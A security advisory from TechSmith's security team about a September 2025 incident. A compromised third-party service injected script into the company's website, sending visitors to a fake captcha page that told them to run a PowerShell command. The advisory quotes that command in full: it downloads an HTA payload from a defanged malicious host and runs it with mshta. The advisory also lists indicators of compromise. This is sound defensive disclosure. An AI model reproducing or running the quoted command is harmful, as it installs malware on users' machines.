On 8 September 2025, between 10:26 AM and 12:14 PM EST, a third-party service used by TechSmith was altered to inject a malicious script into portions of our website, which is also loaded by some of TechSmith’s products and accessible through links in certain emails sent by TechSmith. The issue was detected and removed within two hours.
What You Need to Know
- Fewer than 3,000 visitors globally may have been exposed, but it is possible users in your organization may have visited the affected site and potentially may have accessed the malicious content during that timeframe.
- The issue was quickly contained and mitigated this threat. We will continue monitoring for any related activity and we are in close contact with the third party vendor.
What Happened
- Visitors were redirected to https://amerlcansbarr[.]com, which displayed a fake captcha.
- The captcha instructed users to run the following PowerShell command: powershell -Command "iwr https://cptvrf[.]com -OutFile '%APPDATA%\mq.hta'"; Start-Process mshta.exe -FilePath '%APPDATA%\mq.hta'"
- This command attempted to install malware. In testing, we observed:
- Creation of C:\Users\<username>\AppData\Roaming\TimeTracker\tracker.exe
- The SHA256 hash of tracker.exe is: 2f3d0c15f1c90c5e004377293eaac02d441eb18b59a944b2f2b6201bb36f0d63
- Persistence via a startup entry and scheduled task.
Recommended Actions
- Review endpoint protection logs for indicators of compromise above.
- Ensure anti-malware solutions are current and scanning.
- Monitor for any unusual activity on potentially affected endpoints.
We will provide updates if further information becomes available, and we have provided an FAQ support article to support in common questions about this incident, accessible here: 8 September 2025 FAQ
We're very sorry for the concern this may cause and appreciate your prompt attention. At TechSmith, we will always err on the side of strength in security and do everything possible to proactively ensure our customers remain secure.
Thank you,
TechSmith Security Team